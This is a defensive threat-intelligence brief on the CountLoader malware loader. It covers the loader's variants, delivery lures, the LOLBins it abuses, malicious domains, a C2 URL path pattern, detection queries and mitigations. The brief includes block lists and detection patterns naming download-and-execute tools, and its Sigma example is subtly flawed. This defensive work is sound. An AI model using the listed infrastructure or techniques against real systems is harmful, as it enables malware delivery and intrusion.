Executive summary

CountLoader is a newly observed multi-version malware loader used to deliver post-exploitation tooling (Cobalt Strike, AdaptixC2) and remote access trojans (PureHVNC/PureRAT). It appears in at least three implementations — .NET, PowerShell, and JScript/HTMLA — and has been distributed in PDF/ZIP phishing lures (notably a campaign impersonating Ukrainian police). Public reporting ties CountLoader activity to Russian-language ransomware ecosystems (LockBit, BlackBasta, Qilin) or to Initial Access Broker activity used by those ecosystems. Silent Push+1

1 — Key findings (short)

• Multi-version loader: .NET, PowerShell, JScript (HTML application) variants have been observed. Silent Push+1
• Delivery vectors: weaponized PDFs/ZIPs and social-engineering lures (e.g., impersonating Ukrainian police or fake job offers / ClickFix pages). Silent Push+1
• Post-drop payloads: Cobalt Strike, AdaptixC2, PureHVNC RAT (and other commodity malware/infostealers). The Hacker News+1
• Infrastructure: >20 domains observed sharing a common “/api/getFile?fn=” path and other fingerprintable traits; sample domains: app-updater[.]app, app-updater1[.]app, app-updater2[.]app, ms-team-ping2[.]com, grouptelecoms[.]com, etc. Silent Push
• Techniques: use of LOLBins (certutil, bitsadmin, curl, msiexec, rundll32, PowerShell, MSXML/WinHTTP), scheduled task persistence (masquerading as Google/Chrome update), domain-based C2 retry logic (very high retry counts). The Hacker News+1

2 — Technical analysis

2.1 Variants & capabilities

• JScript / HTA version (most feature-rich): Implements six download methods (curl, PowerShell, MSXML2.XMLHTTP, WinHTTP, bitsadmin, certutil), three execution methods, victim-environment enumeration (domain detection), uses Music folder for staging, and can download DLL/MSI payloads executed with rundll32.exe/msiexec.exe. The Hacker News+1
• PowerShell version: Previously observed by Kaspersky (earlier June 2025 reporting) and used with “DeepSeek”-style AI phishing decoys. It includes an encrypted/obfuscated command generator and abuse of LOLBins. Silent Push
• .NET version: Functionally similar but reduced feature set (supports fewer UpdateType commands such as .zip and .exe). Silent Push

2.2 TTPs (high-value)

• Initial access: Phishing with weaponized PDFs or social engineering (fake police notices, job offers, ClickFix). Silent Push+1
• Execution & persistence: Execution via HTA, PowerShell; persistence via scheduled task faking Chrome/Google updater. The Hacker News
• Lateral/tools: Downloads and stages Cobalt Strike, AdaptixC2, PureHVNC RAT; uses proxying/browser traffic manipulation capabilities (BrowserVenom style) in some payloads. The Hacker News
• Evasion: Uses legitimate OS tools (certutil, bitsadmin, msiexec, rundll32), encrypted command strings, ubiquitous C2 retry loops to blend traffic and complicate takedown. Silent Push+1

3 — Indicators of Compromise (IOCs) — sample list

Domain / Host (sample extracted from public reporting; treat as TLP:AMBER — confirm with your telemetry):
app-updater[.]app, app-updater1[.]app, app-updater2[.]app, ms-team-ping2[.]com, grouptelecoms[.]com, limenlinon[.]com, misctoolsupdate[.]com, officetoolservices[.]com, onlinenetworkupdate[.]com, quasuar[.]com. Silent Push

Network patterns / HTTP path: Requests with /api/getFile?fn= used across multiple related domains (shared path fingerprint). Silent Push

Behavioral IOCs:

• Creation of scheduled task named to resemble Google/Chrome update. The Hacker News
• Staging in %USERPROFILE%\Music\ folder or use of Music folder as staging ground. The Hacker News
• Use of certutil/bitsadmin/curl/msiexec/rundll32 for file retrieval and execution. The Hacker News

Payloads commonly observed: Cobalt Strike beacons, AdaptixC2 implants, PureHVNC RAT, and various infostealers (reported alongside loader domains). The Hacker News+1

Important: this is a non-exhaustive IOC set. CountLoader infrastructure is actively evolving — integrate these IOCs into blocklists and watchlists, but rely primarily on behavior detection and telemetry for coverage. Silent Push

4 — Detection & hunting recipes (practical)

4.1 High-priority EDR / SIEM hunts

1. Scheduled-task creation with updater-like names
   SIEM/EDR query: detect CreateScheduledTask events where TaskName contains update, google, chrome, updater, and parent process is mshta.exe, wscript.exe, cscript.exe, or powershell.exe. (Tune to reduce false positives.)
2. Unusual use of LOLBins for file download + execution
   Detect processes invoking certutil.exe, bitsadmin.exe, curl.exe, msiexec.exe, rundll32.exe with network-download parameters shortly after mshta/wscript/powershell execution.
3. HTTP(s) requests to /api/getFile?fn= across multiple domains
   Network telemetry: flag internal hosts making HTTP GET requests to external domains with the path /api/getFile?fn= or similar query string patterns.
4. Files staged in Music folder
   Endpoint monitoring for creation of new executables, DLLs, or MSI files inside %USERPROFILE%\Music\ (and subfolders), especially if followed by rundll32/msiexec execution.

4.2 Sigma-style example (concept)

title: Suspicious Updater Task Followed by LOLBin Download
id: 8f3d5b2a-CountLoader-hunt
status: experimental
detection:
  selection:
    EventID: 4698               # Task created (Windows)
    TaskName|contains|all:
      - "update"
      - "updater"
      - "google"
      - "chrome"
  condition: selection
level: high

(Adapt for your SIEM and tune for noise.)

4.3 YARA (conceptual) hints

• YARA for JScript/HTA variants: look for strings referencing multiple download methods (MSXML2.XMLHTTP, WinHttpRequest, bitsadmin, certutil), or api/getFile?fn= literal. Avoid over-broad matching — use combined conditions.

 Mitigations & remediation (actionable)

Immediate (0–24 hours)

• Block known domains at perimeter/proxy/firewall: ingest the domain list above into DNS and web proxies (and mark for takedown requests where appropriate). Silent Push
• Deploy/Escalate EDR rules to detect scheduled tasks created by mshta/wscript/cscript/powershell and block suspicious msiexec/rundll32 child executions. The Hacker News
• Quarantine endpoints that show the /api/getFile?fn= pattern or downloads from the enumerated domains and collect full forensic artifacts (memory, disk image, network capture).

Short term (24–72 hours)

• Hunt for secondary payloads: search telemetry for Cobalt Strike beacons (known C2 patterns), AdaptixC2 indicators, PureHVNC communications. The Hacker News
• Reset/revoke credentials for any accounts suspected of compromise; rotate service credentials and MFA tokens where applicable.

Longer term / strategic

• Block and monitor LOLBins usage via application control policies (allowlist legitimate usages, deny or alert for non-standard contexts). The Hacker News
• Implement phishing resilience training that includes weaponized PDF awareness and detection of fake update lures. Silent Push
• Tighten endpoint protections: enable application allowlisting, restrict mshta, wscript, certutil and bitsadmin usage to admin workflows only, and ensure EDR telemetry retention for retrospective hunts.

 Attribution & assessment

• Who benefits / likely operators: Silent Push (and corroborating sources) assess CountLoader is either an IAB toolkit or being used by ransomware affiliates linked to LockBit, BlackBasta, and Qilin families — i.e., the loader benefits Russian-language ransomware operations. Confidence: medium-high based on payload overlap (Cobalt Strike, AdaptixC2, PureHVNC) and targeting (Ukraine-themed lures). Silent Push+1
• Operational risk: High for organizations with exposed employees in targeted geographies or those with lax endpoint controls; CountLoader’s multi-method download+execution and modular payload approach makes it a flexible initial access vector that can deliver a variety of post-exploitation tools. Silent Push+1

 Recommended detection playbook (quick checklist)

1. Ingest the sample domain blocklist into DNS/proxy/URL filtering. Silent Push
2. Add SIEM rules for /api/getFile?fn= HTTP requests and scheduled task names imitating updaters. Silent Push+1
3. Hunt for files in %USERPROFILE%\Music\ and for child processes of mshta/wscript spawning rundll32/msiexec. The Hacker News
4. Search for Cobalt Strike / Adaptix / PureHVNC indicators in network telemetry and EDR. The Hacker News
5. Revoke exposed credentials; notify affected business units and begin forensic triage if matches found.

 Appendix — Sample IOC block

Domains:
  app-updater[.]app
  app-updater1[.]app
  app-updater2[.]app
  ms-team-ping2[.]com
  grouptelecoms[.]com
  limenlinon[.]com
  misctoolsupdate[.]com
  officetoolservices[.]com
  onlinenetworkupdate[.]com
  quasuar[.]com

HTTP path pattern:
  */api/getFile?fn=*

Detection hints:
  Look for scheduled tasks with 'update' in name created by mshta/wscript/powershell.
  Look for new executables placed under %USERPROFILE%\Music\ and immediate execution via rundll32/msiexec.

(Confirm and expand with your telemetry — IOCs are actively evolving.) Silent Push

 Sources & further reading

• Silent Push: CountLoader: Silent Push Discovers New Malware Loader Being Served in 3 Different Versions (detailed technical writeup, domain list, behavioral notes). Silent Push
• The Hacker News: CountLoader Broadens Russian Ransomware Operations With Multi-Version Malware Loader (summary and context on payloads/attribution). The Hacker News
• GBHackers / CybersecurityNews / SCWorld / CyberPress — contemporaneous reporting aggregating technical and IOC details. GBHackers+2Cyber Security News+2

Hashtags: #CyberDudeBivash #CountLoader #ThreatIntel #Ransomware #MalwareLoader #IOCs #CyberSecurity #ThreatHunting